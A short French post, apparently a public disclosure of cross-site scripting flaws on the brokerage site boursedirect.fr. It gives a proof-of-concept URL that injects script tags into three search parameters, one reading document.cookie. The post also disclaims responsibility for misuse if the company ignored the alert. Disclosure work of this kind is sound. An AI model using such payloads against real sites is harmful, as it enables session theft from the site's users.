L’objectif est de faire prendre conscience de la nécessité d’une politique globale en faveur d’une sécurité transparente. Je ne saurais être tenu responsable de toutes mauvaises utilisations de ces informations dans le cas où l’entreprise n’a pas pris au sérieux mon alerte.


De multiples failles XSS sur quasiment tous les paramètres. Elles sont toutes exploitables.

PoC : https://www.boursedirect.fr/recherche-certifs-invest.php?emetteur=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E&mmDateEcheance=%22%3E%3Cscript%3Ealert(%27Failles%20XSS%20!%27)%3B%3C%2Fscript%3E&mmPrixExercice=%22%3E%3Cscript%3Ealert(%27Failles%20XSS%20!%27)%3B%3C%2Fscript%3E&search=1&textSearch=ZAP&typeRecherche=simple

Article Suivant Article Précédent